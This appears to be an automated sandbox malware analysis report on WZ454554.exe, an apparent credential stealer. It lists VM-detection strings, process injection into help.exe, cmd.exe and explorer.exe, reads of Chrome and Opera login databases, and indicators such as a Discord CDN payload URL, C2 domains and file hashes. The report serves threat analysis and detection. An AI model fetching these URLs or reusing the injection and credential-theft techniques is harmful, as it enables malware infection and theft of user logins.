Source: explorer.exe, 0000000A.00000000.365791216.0000000000B7D000.00000004.00000020.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.372898871.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.380728239.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.330482298.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.335749563.0000000008957000.00000004.00000001.sdmp	Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 0000000A.00000000.330482298.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000A.00000000.354514242.0000000008957000.00000004.00000001.sdmp	Binary or memory string: 2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 0000000A.00000000.360107925.000000000EF2A000.00000004.00000001.sdmp	Binary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.333816803.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\WZ454554.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Section unmapped: C:\Windows\SysWOW64\help.exe base address: A50000	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D80000	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section unmapped: C:\Windows\SysWOW64\help.exe base address: A50000	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Memory written: C:\Users\user\Desktop\WZ454554.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Memory written: C:\Users\user\Contacts\Hyrzbcwcas.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Memory written: C:\Users\user\Contacts\Hyrzbcwcas.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Thread register set: target process: 3352	Jump to behavior

Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.365734775.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.342284425.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.327386251.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.330250458.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.346098625.0000000005E10000.00000004.00000001.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.334442837.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.353081870.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.380728239.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Windows\SysWOW64\help.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
34.102.136.180	sentlogisticsja.com	United States	15169	GOOGLEUS	false
162.159.135.233	unknown	United States	13335	CLOUDFLARENETUS	false

Name	IP	Active
sentlogisticsja.com	34.102.136.180	true
cdn.discordapp.com	162.159.130.233	true
www.senerants.tech	unknown	unknown
www.sentlogisticsja.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.sentlogisticsja.com/m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS	false	Avira URL Cloud: safe	unknown
http://www.sentlogisticsja.com/m9g2/	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf	false		high
www.spiegelpherese.com/m9g2/	true	Avira URL Cloud: safe	low

Windows Analysis Report WZ454554.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	552851
Product:	CloudBasic
Start time:	20:21:22
Start date:	13.01.2022
Sample:	WZ454554.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	58b39c2620cdda3d3fa6a125f476fc9f
SHA1:	5d2672c79e9dffb2cdeee0d00e406c03c762985c
SHA256:	fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
Filetype:	Win32 Executable (generic) a (10002005/4) 99.38%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Hyrzbcwcasllzbwmlqsydewtjitxnzf[1]	data	6CE484DDB0699821883415A6A3C03422	80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4	A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Hyrzbcwcasllzbwmlqsydewtjitxnzf[1]	data	6CE484DDB0699821883415A6A3C03422	80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4	A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Hyrzbcwcasllzbwmlqsydewtjitxnzf[2]	data	6CE484DDB0699821883415A6A3C03422	80A0E4C0C07323D6A8E50270286E91CB3A2AEFD4	A2AC9FC2A4FE4F810D426A3DF72C20D6D9894F31AD8A71FEF75CF2E13D8357F2
C:\Users\user\AppData\Local\Temp\DB1	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Roaming\75A8527W\75Alogim.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3	9F895E0E872E4CCFA683538D897279E1	E6C4F5723ACDEDB51A7007AE174D74E6C1C4D2D3	DBD88EA6303BF4A200CE933CBAD16645C5D7E591751B98A0BAD1DBDE5D8A743A
C:\Users\user\AppData\Roaming\75A8527W\75Alogrg.ini	data	4AADF49FED30E4C9B3FE4A3DD6445EBE	1E332822167C6F351B99615EADA2C30A538FF037	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
C:\Users\user\AppData\Roaming\75A8527W\75Alogri.ini	data	D63A82E5D81E02E399090AF26DB0B9CB	91D0014C8F54743BBA141FD60C9D963F869D76C9	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
C:\Users\user\AppData\Roaming\75A8527W\75Alogrv.ini	data	F06976F974E77FCC372A01603909BA74	8810DEB0B9350EB4B9A4944FE488551275C2AEDA	D47B5E60BF213D7462CD33A88D49525F3386D773016DAE2AFADE8F4B5A330EFB
C:\Users\user\Contacts\Hyrzbcwcas.exe	PE32 executable (GUI) Intel 80386, for MS Windows	58B39C2620CDDA3D3FA6A125F476FC9F	5D2672C79E9DFFB2CDEEE0D00E406C03C762985C	FDF39D043CC55D6A72B1FE01C9067BB7591D5C379798499148521E6158AFEEA0
C:\Users\user\Contacts\Hyrzbcwcas.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Contacts\sacwcbzryH.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Hyrzbcwcas.exe">), ASCII text, with CRLF line terminators	6E338427109AB2D376E62A8EE9E69477	3D91FEEDFAC3C367E31ACB301AB3A3F2A116042A	F9E3D569335854ED6FE1C0AB38E28330D6E4E1882591289F2B040CAC6A1CD1A7